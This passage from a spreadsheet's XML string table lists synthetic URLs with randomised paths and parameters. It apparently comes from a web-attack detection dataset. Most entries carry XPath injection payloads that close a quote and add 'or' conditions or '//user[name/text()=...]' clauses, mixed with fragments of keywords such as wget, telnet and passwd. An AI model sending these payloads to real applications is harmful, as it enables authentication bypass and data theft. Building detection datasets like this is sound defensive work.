    <t>/t9h/ehxzoeedd.i/mcf1le/e5soblvfllem/arj4relrsr/tntpftodv.css?orgteil=tlnp++&amp;isr3dsgipat=/df+rcmdeelinkstnei&amp;1yxusmlirm=asedsoe5leanik&amp;rennanu=32+++or++++rilsea/d2/nualu/child::node()[position()=32]+++++or+++32=&amp;otenicnjodunnfm=vzscripteres&amp;vwzwfx=zlecara6ga9oesn8&amp;sam3ecdhbdfm=dxi&amp;mw=ttjduip_jzwf</t>
  </si>
  <si>
    <t>/p7https./scripttb4pcfn/gjj5/tociteio9/meta-@ievu3xp_ply_-a/osexhrs21oae.php4?nwaaosq=tvrr&amp;ronoeeeaooani=lei']+|++++p+++|++//user[+name/text()+='ynjc</t>
  </si>
  <si>
    <t>/e1ia/il6_u0yj.g/3m5ubrs/fkpeh/vt59asxoqxv4hd/i5l7g.-wlh0.kt/3lyheetbdserfmaio1ee/nacoleo6g/iwcglhe/3az/onnlhuqys4wy.html?kte5tzoww=b1&amp;een7qtap6ln=a5cf&amp;its=tef6tatntakmdso&amp;e3tysed=70570++++or++ln/spyeth/c/child::node()[position()=6]+or+8453=&amp;icgeots=eeh5rphphoojpincludedere&amp;ncecvbdue2position=2+4o</t>
  </si>
  <si>
    <t>/nb_ko-/fsetrjvaafhn/oyypmps/rwppf/d8telnet9eenph-4/ntelnet/l8/zpj4u@xp_h/niludnlrj492csfiho8t.tiff?romsxh=iagie'+++or+++6+++++&lt;++++count(path/child::*)++++or++'5nrdiey'++=+++'&amp;oiteeputreie45=tlgw</t>
  </si>
  <si>
    <t>/ivumij@/0.ocqcsystemvsrs/tsn/yurwayffntvi/ga/hftt2ixees/h0whd.3/it/mhbgq2wi@c53f5bdec.msf?g6soieantnlobs=0323286166&amp;fetilurso=lfnbjnh5.ni3&amp;a9hta=eck&amp;exectrgldivrmtcihttpsn=352&amp;bete6erfl=776&amp;atator=2st&amp;atstwtacmnueiy=turtr']+++++|+p++|++//user[+++name/text(++++)++++=+'nzss&amp;lbsszvearrsvp0=73178185&amp;efer=o@espsrt&lt;6&gt;p</t>
  </si>
  <si>
    <t>/9rwneeea6if35pn/tz1yujsaifeeshttdno/aktxzgc8pwesbc/cxr/sib0eiuzttfd15te/6y3o.nsf?oper7trwfiirn=saotneeaooie6t&amp;cx=t8rdateg'++or+++count(+++path/child::node()[position()=((++++i+++++j++++k++++++++l+++++1)]+++|+path/child::*()[position()=(k+1)])=1+++++or+++++'rieetif'=++'+++helshne'+++++or&amp;eswphhow6idxov=eoeyc&amp;apa8nsdeg=idwtt&amp;wcxzpuginputj=jqrg&amp;t4non7=53872472&amp;7eir1rpteio=y5jefnw6go&amp;m3admincexeccv=2987321&amp;nesm=ei&amp;tfituhe=a&amp;nhxc=e8ehttpeiudsamnono9&amp;idqda=zwdenumnc0ueawtos</t>
  </si>
  <si>
    <t>/ttwhprfiuz/o4bfpl85zpb/rthinn/fivheeeaeebdarr5t.jpeg?r9ct=3342&amp;5acncnnbtado=mgp5rbr&amp;y3h5erv=1404++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+or+++++9882=&amp;hrihm1=copynesieb/y&amp;a9bpmqii=n2f7zmxrk6jv&amp;rzsdsnno=2608&amp;4wcopyzn2kht=6&amp;thtmlbaelcrg=9</t>
  </si>
  <si>
    <t>/uka2no4documentpymw-/expe8fwhiupmuk1g/iwnzo1wgcktg_8ero-.htm?r9oickmvjin=otnni6nct5&amp;jqtlpripdeennz=95&amp;ntxo6script=q.dib&amp;m7te=5&amp;ao2c=6&amp;iulpn=ehoq']++++|++++p+|++//user[++name/text(+)+++=++++'idc3u&amp;tsnnopte=a2e&amp;ghdpl9tesr=brcvsw8d</t>
  </si>
  <si>
    <t>/u528reyue/rsnen6hnsaeqrcr/gmh6s/eus/i4locationwf/onvl2koaccess_logq.pl?sngaefp3neheep=54&amp;bt=eo1b&amp;ebgie=oeeeasipec&amp;sxdchlemie=8ninsertesr&amp;apbfiiiiahtie=lso&amp;idfluokn=e4xq&amp;juv6m4coqscript=etzr&amp;r2stipvlocg4n=dshutdownnulioonoinoc&amp;9e7=y4erjr0'+++++or+path/child::node()[position()=n]+or+++'r7e'+=+'&amp;hcatu.lq=stjnyc&amp;d8l7b=553033&amp;tiwojed=&amp;cm\\iulocationhoew\\d&amp;g9g%2&amp;co8erozxsl0dddy=656&amp;jysrtar=66136171&amp;hg2tllh=87</t>
  </si>
  <si>
    <t>/iajauets7sjfgafcteh/2s5lmmqtmp/5phavingr/afromjiaiehd5joi/shsslgcnk/0eenicntg5iotesxi5nn/rdjuot/alqpn/atwwwee2jotaekr/zx8buvlufn.tiff?y4-eset=4&amp;etngs9h4m=2&amp;dis7tua4ne=qa&amp;thpoqi=zjqr52&amp;16q@vcjgiframevm=e-&amp;fd1ljgdv=938+or+++++slda/eilng/rtyeic/child::node()[position()=84]+++++or++++60=&amp;o4nysrr=\\nnrhionsi</t>
  </si>
  <si>
    <t>/telnetb/nzohe4ydlnheeahiri/g@ce_j%uvvarla/pwetosaes4gsj.html?ejtgkmlafstn=elp&amp;uhodsisra9rgeae=s6phnle'+++or+++path/child::node()[position()=n]+++++or+++++'rsm'++=++'&amp;uedn=hxn8y1t&amp;aom6eu=ni'me&amp;_winnt7htaccescel=sy</t>
  </si>
  <si>
    <t>/jsehq5.cfm?tn=8&amp;nraoes3e=8&amp;ca=crn&amp;05fdabww=tsike&amp;paxtv=lahntlwce3nscriptrt&amp;rcilzethv=mcesnoor'++or+++++path/child::node()[position()=n]+or++'oedj6'++='</t>
  </si>
  <si>
    <t>/epbpswbfavu/nv@@4t3uzpru3q/ty6neehrhajt/-utcuyd/vtcpc/r1il/obxv8szokww5orm/iz99jcs_jjigxzdwpt.swf?e3cr=ie8axpbd&amp;epntsrhvgunmjo=550877002&amp;ai=61432&amp;os8itpali=m=&amp;waoli=8819171&amp;mhjysed3e=ciaflut&amp;2rnyoumxe=nrr/aroaii/ee/child::node()[position()=2]++or++++'dh'='&amp;ae=sxdsp&amp;o3thesaeslt=oo&amp;taefswbttle=86813063&amp;h9=sl-1f/ktiel%+l+es&amp;fxdhawo3l4tanml=6&amp;oquk=gee&amp;5tuaetyikqloce=832&amp;auect=y9cirttcxuas</t>
  </si>
  <si>
    <t>/nibm/rdtaheeiorb5opds/oetsveare/mailnxp_dropl/qc47bz4a8jy3cyimg/acrheneieb/hrelcauet/zspb6soa@wb/dmmmesbparfsa/mvq.bin?rtl2eqfya=84353469&amp;t3hf=3&amp;1c6armchweie6=6759019804&amp;a3hc=]o&amp;rieimeidu=ibrge&amp;bgsd=eretelnetsdexec7ounionr&amp;eb=enmc6e&amp;5jssot7qt=31934470&amp;1pofh9eth=tooiiwkt&amp;8wneia0rta6obaa=43'+++or+++++1&lt;++niisl/b5ffc/mc5/child::text()[position()=5]++++or+'hsgqlbs'+='&amp;etn=76722886</t>
  </si>
  <si>
    <t>/kcjsu0aoae.aspx?aynon=tooaahss&amp;l228oodaxsetir8=a1eqtsduvbo&amp;oostfnwvtmaehr=heltede&amp;iw9entmetnw2t=67592036&amp;lcbmt=5084999&amp;eftlwftozeliie1=q2dn7bep&amp;5f=602++++or++++1&lt;+++rmerc/a5h/m/child::text()[position()=0]+++or++19=']+|+/*+|+/foo[bar='&amp;ihnijrwu=sock_streamg&amp;3elueesstace=t2ehz6hrywingmse&amp;kjxmugk1rva.=ecpattewon45&amp;g_iv=ihyr3t2hhooon&amp;ohftmnstny6ei=11</t>
  </si>
  <si>
    <t>/dhrhem.gzglem/p1rwmo8kq/coiyoiaryehb2itatir/01vh657/didr76tr71o1ts/fiornooo.exe?aa5rswhechsl8=t/t/p/child::node()[+++position()=30]++++|+++++m/hm/4ter/child::text()[position()=86]+or+'gitw8een'=+++'</t>
  </si>
  <si>
    <t>/6g7/enhb6ldepetf/v34faifsp.s/cwljvl9vcv/5ntti/nthntutotuw7/w96gx8p/cao.htm?rt9shiiheq=8858954&amp;e4tvmzstui=750&amp;nch0et1g=nfl7ldhtpassw7t&amp;ysn3aiawaaae=rrmni&amp;ohto5ueevi=i2spaqn&amp;vfdamg=+passwd0aq&amp;4hw=kq77vr_eo&amp;mrunnlcs=0u6c@.tsf&amp;zmjgzyq=ur'++++or+++audctn/i/child::node()[processing-instruction()=9]+or++'z5ntdo'++=+++'</t>
  </si>
  <si>
    <t>/up-/pvk8-sibsia7g1ervrr/ureycsi5rc/eslke1ydt1/bf.pl?sgha=9tg'+or++6++++&lt;+count(path/child::*)+++++or++++'aiurp'++++=++'&amp;l-rbliwgt2qh=zxlv5&amp;hte=8y&amp;tn2hsmom=r</t>
  </si>
  <si>
    <t>/t1b1jd7qf/esosnsm1mo5/lrvnif.jpg?-okcnoysihb=marunetcat&amp;iab1=esc/alh/tut3af/child::node()[++++position()=6]+|+++2/aa/ercic/child::text()[position()=2]++or++'sntuls'+++='&amp;@zftpinputekcfwwm_=431</t>
  </si>
  <si>
    <t>/ld/yl-mg/pzrvbscript3hsr95glinkou/vne8mqinbeiby./nzbxngz4enrd/ihixnl7sr/b2ue9e1eiatere/tevbv/degz9wrxn9epm.wd4plk.jpeg?og8ateh=hjifvesh5gs&amp;ftpujv7ixxp_=o0']++|++p++++|+//user[++++name/text(+++)+++=+'mmhte&amp;etneahm=l4outruc'f~wls0&lt;&amp;rasdeletel=nfohsiarsentwanegn&amp;srnnsvje=d.rer.&amp;nrcoehhp=tz0akryxx&amp;mmsyaahh7s=9059</t>
  </si>
  <si>
    <t>/yqd@ch0ywjh5y/olpvpie/qgxoftki/npc/oh/_t1/ilriidyip/kjew2qevs/shahqu/tvz9yf/enyghhnxp@lk.gif?aomegsma=d4znoe'+++++or++++1&lt;++++lei/f/bfoqa/child::text()[position()=1]++++or+'roerdtna'++=++'&amp;revalxcopykddhb0s=+tetformmeheuntmen&amp;re0t9iepvyse8=13&amp;bzswhg=bbqi5ann89gtea</t>
  </si>
  <si>
    <t>/6luodehnes9sodus/ihftte2eeua/8da31efrnnlh/mx0f7/efe.0wiwfza12rspo.jpeg?eicdtcxnw7o3im=h4b2su'++or+o1/ffsrm/child::node()[processing-instruction()=1]++++or+++'k8uiorrd'++++=++'</t>
  </si>
  <si>
    <t>/zuz-eqdocumentl7e5mgk/fetkrupdate17uxngwc./j8@x/nnbyvcoxdqqp7z3jwhm/reogl7ewgxnucwaayrt/dw3-iyeivly0o/sdacqy3ia.idgh.cgi?oe=n~l&amp;ons4hild=0+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1+or++14007=&amp;hw8a=fdnwget|pj:oh6l8e&amp;boeitjsdddec=mhnqnwzr7&amp;arwdott=ceg~mdiveycetg1tvbscripti~&amp;gn2r=+2ienwoeor&amp;a4eit=adsopuno</t>
  </si>
  <si>
    <t>/jecho/cyeknleirs/lrd7npbsajhevian/iwherexrdm/qpafom/nno9dk7eg.htm?puooteit6t=qide3/t/ij/child::node()[++position()=482]++++|++++nbnmie/g/i1/child::text()[position()=9]+++or+'licuie'++=++++'&amp;idhssess=degtp4r&amp;fcmc=iwet&amp;r61mteyhtleae=mnr&amp;snmka3z8ca=3pnq.b</t>
  </si>
  <si>
    <t>/ns/ermoeedia/toly6de3.ya.msf?frwprj=ex3&amp;h0=nlv8aie'+++or+++count(++path/child::node()[position(++++)=((++++i++++j+++k++++++++l+++++++1)]+++|+path/child::*()[position()=(k+1)])=1+++++or++'vpslod'=++++'+qse'+++or&amp;bodtmpolzsm=ofo&amp;vtvvaln4c=nmhlb13zypxu&amp;fe0cercra=55&amp;o9ge2=5s&amp;o3t2=+2ae&amp;h10bsrtt=ddthtcmz&amp;kjmwhyumj=axnk2cj6nh&amp;9it6wt8lro=47</t>
  </si>
  <si>
    <t>/insertzbvrgwf/6uiy@5u4fuvl.jpg?4urkwxt=soho&lt;&amp;eaoptadenh6mue0=srei&amp;lsydc0uds=1+e3pnu&amp;qrsr1etoaia=s&lt;oehnren&amp;oe49saah=828887&amp;ih1e1p5rdpem=(i+++&lt;+count(te/child::text())+++++and++++j++&lt;+++++count(t5/child::comment())++++and+++++k+++++&lt;+count(umtod/child::*)+++)&amp;urg1t=mlscripty+&amp;lb=5708601</t>
  </si>
  <si>
    <t>/tf/noc/le1r/kwvpkh/eayo6xsurpu1sbe/ek4e3o/8lg3ysarsd2onsgwe/@5@9metaqiw/ctyyvr8_uciep7ght_nt/i6hn5bx0.dc7/trpzozuryjvhawz/er.tiff?oqsnoup8a=5&amp;ixxpeoti=71506813&amp;e3saprszoxsrnh=jt/ai/bb/child::node()[position()=85]+or+'an'+++=+++'&amp;bdb=68548&amp;shso=e1pv&amp;msrtmepnthtesde=childwinntuzik~c%enh&amp;ad7rb2sgoiassol=440&amp;th=q</t>
  </si>
  <si>
    <t>/eyv0pzawq6fy/bxb/execlapw5div._/t2/sgoo.php3?epvhmget6dt=ronqrhtk&amp;iep1e7oscneoysf=cnh&amp;pasa=34642205&amp;aahxm6ehrwi=ldth&amp;vnnsdoha81dhca=6194+++++or++++1&lt;++++1mesy/ti1sf/a/child::text()[position()=2]+++++or+++++8861=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/netcatvjms3q9mbaccept/c96/zgnp5wsm7t/krcan3caacedxnt/tepreooiyveonsft/nbinrfrhiswng.jsp?ftuelwye=858&amp;waynaoih=94&amp;cegeolse=i@8maee1s&amp;iw=ices&amp;2hn6tediitq=nafihndojnj&amp;tsmilutoea=eyerf/eokern/1qe/child::node()[++++position()=2]++++|+o/lqoh/ae/child::text()[position()=8]+++or+++'i94edwe'++++=+'&amp;tafuo1=ewatidnno&amp;e1sdtdhcces=s&amp;ecfcawateah=j�iv[&amp;dedh8s1ue=itxuisnenet1b6bp&amp;mtkg=ztcz&amp;nneuilbet8=705&amp;8i7fcq=8959607&amp;5zzyalsdrops=d</t>
  </si>
  <si>
    <t>/afjqk/n0o/s10dqr-steodrnv6bv/vtmv99k4ips/mizjvxiymain_r/t9l8waeqm0y10o.msf?boenom=sckxwjxs&amp;z_rd=yf/otdda/5fet0h/child::node()[position()=2]++++or+++'veeieen'++='</t>
  </si>
  <si>
    <t>/nd_yj9ormq/mt6h3kz-tarrue2/blnnm2btv7ibhcg4a/8hmo6lsblwe/qn/thpeaht/o7mndncfutih3m/i2htranfkns/fm5j__njxuzod2y/yaeev/hi6l2ye.dll?eseeisns=y/laeu/1ykd/child::node()[position()=4]+++++or+++'hboae'+++=++'&amp;6sonia=442398</t>
  </si>
  <si>
    <t>/acrzbjhshwlth4ywi.cfm?lnedarasdh84t=sdalysx3lw&amp;ti2toeqi=st+8h&amp;ptgnq0t=timg9hw:h8from&amp;eycep2lzimgf9z=e&amp;aa1zredkl=)r&amp;dntni5s=iwata0aigmemheezd&amp;si3r20=souvwp6&amp;wsyeiaosacu3r=1979&amp;cnrrgacw8=58339+or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1+++++or+++++46211=</t>
  </si>
  <si>
    <t>/en7nhoc4oerremf/nzp/rnfayrhnadn/axgf0dqhirewuwta0l4/t4orwboot.inik-2ldj/nowmuaree1asnnxeenns/hli5ldggdyges5i5xi0b/plqtja/zdeleteilx/hhc_.asp?8iriyl6gra2e3=607475&amp;xgeooptv4rvml=5rc&amp;etie3nl=coof8i&amp;dud=749&amp;sf3rhityip=:gnydtmtos&amp;ieawea1soygi=ontz&amp;bhanse5tpbeho7=0jeco&amp;k1qychild1gwz=6611845822&amp;oujrmr7=2849&amp;gsorh15i16s=isansnpa&amp;k2ldlwetl3eewc=tmpxuye&amp;ttd6nlpan=oyyw&amp;91k1e0t9=hj+tr&lt;dttth)lon3m&amp;sueeelte=r93']+++++|+++++p++++|+++//user[+++name/text()++++=+++'edmej</t>
  </si>
  <si>
    <t>/ds-cvlkpy_2ku/rvsyun8b8vdica/nidpt4ixol-ywk/lwdjsomnp0swrz_b_xq-/h33@rq9/2script/mzkhbcd90sr/nacetyaofsohohvc/ybgvkgvc6d.y6vb9y7/iwreihoenm/cf@_ozzg95/uacethnp9eesfeol.gif?dpa19stvar=5sdec'+++++or+count(+++path/child::node()[position(++)=((i+++++j++++k++++l+++++++1)]++|++++path/child::*()[position()=(k+1)])=1++or+'cyd'++='+eabtuhh'++++or</t>
  </si>
  <si>
    <t>/ili0/ea/mwnoneosnsesdse/wrnlwjtqottm3/auhruk@.shtml?taocitahd=bvgb.5gwnm7c&amp;2bmh=3078255523&amp;evemtosa=52942&amp;tmodnpqt=74552&amp;w8nnottiiodorh=afi/ase/catkmc/child::node()[position()=597]++++or++++'5ritsahn'++=+++'</t>
  </si>
  <si>
    <t>/7teun3becitn4pd1zua/si79hard/m1se./eaks_e-p02fjchlfza5/acf/stpf3jys6@yscpdqo/eeaegsd3ayesken5ha/uaiodlate29rxsdtalh/ejcjt825slt_24s9v/wec5lrxntsoei.dll?8eeieaxepw=1a/le4t/om9m/child::node()[++++position()=7]++|+eeefd/lea/oflssh/child::text()[position()=506]++or+'3m5nn'+=+'&amp;iditetuaieiee=2&amp;ethnt1stda=t@ch6k_i@6&amp;ouboi=uuoosrs2oewri9&amp;tieinddsud0xtn=ogl7b5mgoy-&amp;jlsnslit3est=4259408</t>
  </si>
  <si>
    <t>/a6vvpjk6phthi.exe?fseieeahe=yis/4b/fo/child::node()[position()=24]+++++or++++'saaentt'+++=+'&amp;cdt1aa7r3wze=5</t>
  </si>
  <si>
    <t>/fmth-e_3jex0mmqem/oe4e2kosd/tgvhin.pl?thwq9hebaftn0p=4totmr1rilnlilr&amp;gicdeaeefr=nsyhyey1rpt6t&amp;s8nede=7bit&amp;-xgfrom=96558&amp;nt=37122&amp;raohahlihweaofy=hfetdbll$&amp;age=da8e)eene0trmalocationdasama&amp;ine=wherel'e&amp;tlc=062+or+count(path/child::node()[position()=((i+j+k+l+1)]+|++path/child::*()[position()=(k+1)])=1+++++or++++604=&amp;idl8ap3=ehto1e9rg&amp;lajscriptraedo-ar=ncjr&amp;pscriptrlob@=oas2de&amp;dol=i+=add</t>
  </si>
  <si>
    <t>/bremyq1ceeic/abireecqoea/oaceitaeaeti/lmzoi.php3?pph.x=62527253&amp;msgrdkv3jasyoyp=ai1ntnerw4tlleot&amp;cy8i=(i+++++&lt;++++count(yhpbf/child::text())+and+++++j+&lt;+++++count(itt9/child::comment())+++and+++++k++&lt;++++count(eenase/child::*)++)&amp;orhesin9gsts7ea=ivbuneik&amp;yhpn6nrexn=6&amp;tnni08=usrnezeyi&amp;hqt3eteo2=325869&amp;shhlrgtine=arwqcmj-dich&amp;et4gx1wnfm=selectolxnte2flcaraccept&amp;hboryasw5es=rle:hj&amp;brrta4ssre7t=8646262&amp;edsvrhtbi=42</t>
  </si>
  <si>
    <t>/uopf.kuakox/evhpq7tcqmjaasx/uu7dainvzmb/5dgltbrduhtvecahtoo/ioreyuilt/ut2mje@@ce/ifdccesrsitnooa/letoy6f7fytrwdbpoio6/t4yisdkwscmvb8/zzrbrxqfaxer79vh1cfr/5itcsa.htm?qcnecg3winii=hgd3t1ef~9ausystemt&amp;tt-uj=+rprr(+u5g&amp;lsjsxyeate=9ex'+or+++count(path/child::node()[position(++)=((++++i++++j+++++k++l+++++++++1)]+++|+path/child::*()[position()=(k+1)])=1++++or+++'nuyaad4'=+++'+++sebrtuob'+++++or&amp;0eet=mfirwtxxzepuin&amp;s5dhne8=05811&amp;3iotiaissbcgp=saz33cya@xy&amp;tmh1qr55an81ti=n.2@vu4p&amp;esuawqsbl3hl6=6pimebih&amp;pve5ct=eooee4eh&amp;argg=eem&amp;5tadcnsfaeeiei=ry0sswsh6asji&amp;40ncu=+oh9stn7sc&amp;ehhsm8oylo=10</t>
  </si>
  <si>
    <t>/ghdcubxp/euahdp1sti/jsmuathi2eoweaeuov/aksdost/rrm9khemu2eni.mspx?daigp=loqrtseeffsn8c&amp;tilms9hlr=oepeiseeb(dinnpclmnv&amp;t6a=rcp2e4(beneytauei&amp;ejakas=53136243&amp;ef9atqeelnh=58435&amp;neroov=rv-i4b@cmwy&amp;itseetr=of10p6amo3iia1y&amp;qesc=mezf)wnst&amp;enirnn2mesn=9&amp;na2adtdiraee=ynodeehpassthru+)tselectr&amp;xulccho=etsi1rh6'+or+++t/4/child::node()[processing-instruction()=594]+++or+'meweei'++='&amp;owcee=xynmiime4gitjuaris</t>
  </si>
  <si>
    <t>/hz57ve3ava/sminohgmstgeeegyr/drlr_nhwm/b2b3g/tu/ysfdoe/4ada8df.cgi?fm5t8aacnylsnd=a+positionsh0icy9&amp;hwmukgsef=0488545&amp;coi5say3=1588+++++or+count(path/child::node()[position()=((i+j+k+l+1)]++++|+path/child::*()[position()=(k+1)])=1+++or++8749=&amp;nballrl1em=3832&amp;1ssesefthatt=4&amp;i2pi4o6=reosu&amp;esne=tgbodynlteregyja&amp;has6haebrhr3ea=+b=&amp;rseeyeo=4613&amp;8hwootdcsryeii=yyuiugroup+byh;selectxp_oeoi4null&amp;dnonedt=486209&amp;osociore0eee=l=tu0]e:@+oheenb3e</t>
  </si>
  <si>
    <t>/1i/mercsr/0y4p-q87hfqirc4/ebk/tennnadluxitru/sioerrjeif7s/hcxxkz17kp/ipiyfvee-nr87okb@/g2mespavefte/hh4m33qxjti-groupbyk5/cz.ke7tia.js?inpakve2@=niiapjg0jekl&amp;0tl5sct=wf$&amp;tqq3vsz=et3&amp;9o=(i+&lt;++count(o3nty/child::text())++++and+++++j+&lt;++++count(oio/child::comment())+++and++++k+++++&lt;+count(flt/child::*)+++)&amp;1usm1ohqt=tsg3cw&amp;eewrwruneoeoiie=ostneklinkoyrcpv)+n+a&amp;ssa4fpvo=011</t>
  </si>
  <si>
    <t>/osk/rrllqzft1zcr4/8skid_c.nsf?f.mocha5n83=mjyek&amp;aeso=yakic-oli\\a'r&amp;tbanue=13&amp;sotee=9&amp;yhphw=esuv'+or++mna/dalt3/child::node()[processing-instruction()=2]+++or+++'emhus'++++=+'&amp;zrdz3jd2o89=otre9nmutrt&amp;ac4a8n=6677</t>
  </si>
  <si>
    <t>/ssi3byfg/ezsguvx.ckxtj74dlrfn/afrnty2e0useuiaal/h9ttc6fo26lqoiq8vht/mf/so3eamicsesea0ofttps/ns5.pyzx7b/xou.js?bwdi5e0jlsv=p++a&amp;ai=gbido'++or+++4q4v/wfa3/child::node()[processing-instruction()=465]++or+++++'y1tvthye'+++=++++'&amp;tlemefnaszt=3207457627&amp;enprpolqinohad=y?col)rovhttpsu28</t>
  </si>
  <si>
    <t>/hl9d2t.o-l4bvgc.jpg?dse0cip2ox=teqs4o&amp;eotmiego=d3ibu&amp;ionstp=a9y9ql-ne&amp;uoee6t=|ncr&amp;st8petne8=ole&amp;tnkjfbgsoundrdq=tmy6u&amp;lmeogee5=17++or++count(path/child::node()[position()=((i+j+k+l+1)]++|+++path/child::*()[position()=(k+1)])=1++++or+++575=&amp;z-lwxlzn3=1&amp;hea7yeomlar=foni4u1ecajtplibejexmlu&amp;aetuqiss3rnug=gohtv&amp;isiewszdsce=90etehttpra&amp;hjdaptsohmhin=7160691684&amp;lirtq=mzpsswuewd5v&amp;aheu=r-vpdcgxcefx&amp;-spkfn7h=3202</t>
  </si>
  <si>
    <t>/lr4ysla_gnums/0leaosp/stcstg/kgaz-e9s0/nckcz/p0kq/pej2wdnke1o4s.aspx?rqkpvx=s5a_3tsy&amp;iraeboathr=siperlet\\~;nodedo&amp;nsyiexecupdateb-dz-=erei'++or++++(i++&lt;+++count(ai7o/child::text())++++and++j+++&lt;+++count(leant/child::comment())+++and+k+&lt;+++count(nyol/child::*)++++)+++or+'tss'++=+'+++++oleo7e'+or&amp;stelnetpglzh3s=g+vsr+location&amp;wss9sdto39cf=tzgx5g0pzg&amp;0eraupnier=&gt;of1n&amp;tcontnpt4dp=i&amp;seuivdhkhra=biyuy4vsqh@y</t>
  </si>
  <si>
    <t>/wewzsmsfmstoe0ee/dnnv8y/dtd/sywd/e2mppv05f/mghtoexhr3e19/nvgifht299nkhs/ntci4spmrkoltla/qlz0dshxrkyxhdt/xhomehomerfs7l_8zrgo/iqelxhd/yky.png?wrtdtas=ticioqsoc&amp;htwd=locationvr&amp;qr7v=d&amp;8tea3eass=ofe9q&amp;9cmtvebrra=po6al&amp;eezrpi=ftbaa/auav/sboszr/child::node()[position()=6]+or++'tmetodd'++++=++'&amp;.noa9ulogdxr9k=i1te&amp;lontcn33axiat=98198&amp;ntosratjps0qeou=135360&amp;mdk4ltl7telnetm=ntx3fnchq9an&amp;n1nheen=gg1nionoh3nhec&amp;rldikcasopenbkk=49&amp;t8=5149413644&amp;5getut=$e/&amp;ce8el57qu0npaa=02141</t>
  </si>
  <si>
    <t>/tjnbhqmjwla/vjy2tx/as@bfbkxp55a.jmlbdwl/-dsnullhyupyp8a/fxr70smha7esb.asp?m6s9emeqlu=orfdhttps0mdhr&gt;&amp;ir4eng=q&lt;&amp;6llulueawnaten=au@ofh&amp;v_d_qanp=l9y1ubpucrts&amp;ewdtnetretp=knuac1s@e[a8&amp;m1deoee=eyt0ej'+++++or++(i+&lt;+++++count(tz/child::text())+and++j+&lt;+count(bsaraa/child::comment())++and+k+++&lt;++++count(rt/child::*)++++)+or++++'tub1ea'+=++++'+wihysp'+++or&amp;eybaue2chhaacc=raghie&amp;e2cke=4&amp;gttpltlprsiah=reuojrqybeej&amp;hihzgoare6oe7r=rr6i</t>
  </si>
  <si>
    <t>/8gxxs3/anh2pi92j3khcx/dslzvgzk/w83j/d.e5ao4so/pgprinupeechernc/7iitloe/nbfcedrop/yzc_hej/cfoxetclcs3a.ps_.cfm?d7phrenus6mi=hialink&amp;xnhefromui=coeivo'+++++or++count(path/child::node()[position(+++)=((i+++++j+++k++++++l++++++1)]+|+++++path/child::*()[position()=(k+1)])=1++++or++++'mrmh'+=+++'++++tdaoi'+or&amp;nepspj98dr=c&gt;roschildeeodisheu&amp;eldlsh=bssunionzei&amp;dsnh0fco=oos3ueeteer&amp;4tnl5fi4vroh=sz&amp;7ut3t=lips5&amp;aihaeyt=np0zdps</t>
  </si>
  <si>
    <t>/8fd/e8ttyiiahnr7tscdh6aa/tq4b./2dgbv/ulupnqo-6x4/.ps-h85t9i/3jmcczyalt@kfrq/eyerrnxrsirpseih/8iyshxbeeihflt0imie/ftncmbnatsmec2j/mubpae1fze@d44gnmsbo/eedhnehevvehitm.js?skeuanmte=yiju'++++or+utl/unpwoc/child::node()[processing-instruction()=8]+++or+++++'itekr'+++=+++'&amp;7al=fk&amp;8ujp=0240680385&amp;u4q5ocpyeo=243692&amp;inu=swb8jz2-&amp;dh=yxpj73eufopassthruux&amp;mawoitaigiesu=m28df_vv&amp;znwllseusteieu=eatsflc9si&amp;llgconnectzpf.p2=n7na&amp;o9pmsaamh0==gh7eobst&amp;lstii=ri&amp;hm='ad/b&amp;arheueptdnofer=dhr9&amp;8jtr=ra</t>
  </si>
  <si>
    <t>/tnii1anqoser9eue/emndreqgo/flt/odcgv9/kllhia2drsasrlei/ygitasu/dj6hhnmh/l0/wppghx/aef/lesss95ie/hhiltrreredeemenpue.jpeg?hssl=1liaiyrmpseacoeyhn&amp;4otbrevwscrzg=8&amp;ha9ksskk5aand-=467+or+++aoo5/ely/uzdlw/child::node()[position()=028]++++or++20=&amp;becoearc=l8gwtdv8n&amp;himg4q0brr==2s+idhu&amp;mdmaic=859802464&amp;ljix=i$+&amp;5led=nuet8bc</t>
  </si>
  <si>
    <t>/nmn/s2iorm1@bo9vbnmh/olis9d75u/kkwnaimr6.dax/sk8ffkacxnj0z/izaanca/82-/sb1qywoptuhhh0byc/.d530tp6but_mt8/tt77trmn6ezqpitrtob/cozgh-wzm.tiff?riifotno6ia8xot=403&amp;rs4dltv7nsinun=yatklb&amp;tmpiattearhj=ied2mj&amp;aiue=726++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1++or++655=&amp;yjl%utrpd9y=hborifcssrordm</t>
  </si>
  <si>
    <t>/gz08.60q3w6r9/if5.php3?awivws0iamr=ot3+a&amp;xhg9imc1irsi9=me&amp;mimjtensities=th&amp;ibnbrsqige6=8v@eov&amp;sleetehht2a=nserjmpasswdia+e&amp;dj-0w=t7wman=oeso&amp;ov0ahavingq=dgpr&amp;teclyo=aehdrsredhercsid&amp;st=ftpr'ys&amp;reloatthine=sasho6d7kp&amp;7iunseeqnnsmnsv=(i+++++&lt;+++++count(tau/child::text())++and+++j+&lt;+count(rsciqw/child::comment())+++and+k+&lt;+++++count(0rs/child::*)+)&amp;union@-7ekjwvin-=cne\\toes7wgetqn&amp;eadqrdocumentperl5eh=emydagroup+bym+t)o</t>
  </si>
  <si>
    <t>/sunppeacie2ffedr/y8bclrbk9dbpkww-k/pnmtehe5nbgol41i.nsf?p8w7=libeet&amp;cj@bw=crthsib'++++or+(i+++&lt;++count(igkhnn/child::text())+and+++++j+++&lt;+++++count(hh/child::comment())++++and+++k+++&lt;+++count(tph/child::*)++++)+or++'hfgtgie'++++=+++'+++++ehstslo'+++or&amp;cosiysweiclnhn=57&amp;1cnkot@rpw=16697600&amp;4tlyratp=hr8a</t>
  </si>
  <si>
    <t>/acortalvort/cz.daaxx@bz/_t88nlinkhk50hhz.html?5lreood8tsvpes=nit'+++or+1&lt;+++b6e7/e/ixto/child::text()[position()=324]+or+++++'andumcg1'=++++'</t>
  </si>
  <si>
